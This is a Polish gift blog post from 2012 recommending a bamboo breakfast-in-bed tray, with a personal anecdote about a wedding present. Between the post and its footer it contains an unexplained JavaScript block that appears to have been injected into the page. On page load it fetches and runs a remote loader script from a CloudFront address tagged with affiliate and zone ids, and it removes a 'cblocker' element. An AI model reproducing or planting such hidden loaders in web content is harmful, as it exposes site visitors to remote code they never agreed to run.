Prezentuję następny drewniany prezent

8 maja 2012
T jak …

Tak się jakoś składa, że ostatnimi czasu wiele prezentów, które opisuję zrobionych jest z drewna. Sama nie wiem czy to wiosna natchęła mnie tak ekologicznie czy coś innego sprawiło, że to takie właśnie rzeczy zwracają ostatnio moją uwagę, ale mam nadzieję, że Wam to nie przeszkadza.

Po wpisach o kawałku drewna do łazienki i innym kawałku drewna do kuchni, dziś zapraszamy drewienko do kolejnego pomieszczenia w naszych mieszkaniach i domach czyli sypialni. Nie martwcie się jednak – nie proponuję dawania w prezencie łóżek ani szaf, czy nawet nocnych szafek, tylko coś znacznie mniejszego i znacznie bardziej mobilnego.

Pewnie zastanawiacie się co wymyśliłam tym razem, a tymczasem ja muszę się przyznać, że pomysł na dzisiejszy prezent wcale nie był mój. Wymyśliła go moja siostra, kiedy Pan M. i ja braliśmy ślub. Ponieważ była wtedy młodą studentką nie oczekiwaliśmy od niej żadnych specjalnych prezentów, a tymczasem dostaliśmy cały zestaw, w skład którego wchodziły duże filiżanki z pasującymi talerzykami oraz taki właśnie kawałek drewna, jaki widać na poniższym zdjęciu.

Taca do łóżka Bamboo – cena: 199,90 zł (www.dukapolska.com)

Nie muszę chyba dodawać, że wręczaniu tego prezentu towarzyszyło życzenie, aby Pan M. jak najczęściej podawał mi śniadanie do łóżka – bardzo mi się podobało kiedy to robił, ale taca sprawdziła się też doskonale przy jedzeniu przed telewizorem (tak wiem, że nie należy tego robić!) czy pracy na laptopie w łóżku. Nie zmienia to oczywiście faktu, że to właśnie podstawowe przeznaczenie tacy – do jedzenia śniadań w łóżku – sprawia najwięcej przyjemności i nadaje temu kawałkowi drewna bardzo romantyczny charakter.

P.S. Zdjęcie pochodzi ze strony www.dukapolska.com

if(typeof(jQuery)==’undefined’){(function(){var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.src=’https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState==”loaded”||ccm.readyState==”complete”){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf(‘https://’)>-1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};

Tagi: ,

Kategoria: , , , , , , ,

Blog jest po przeprowadzce,

więc jeśli zauważysz jakieś błędy, których nie wychwyciłam, napisz proszę do mnie :)

kontakt@prezentujeprezenty.pl

Poprzedni

Prezentuję kolejny pożyteczny kawałek drewna

Następny

Prezentuję mały ciekawy gadżet

Comments are closed here.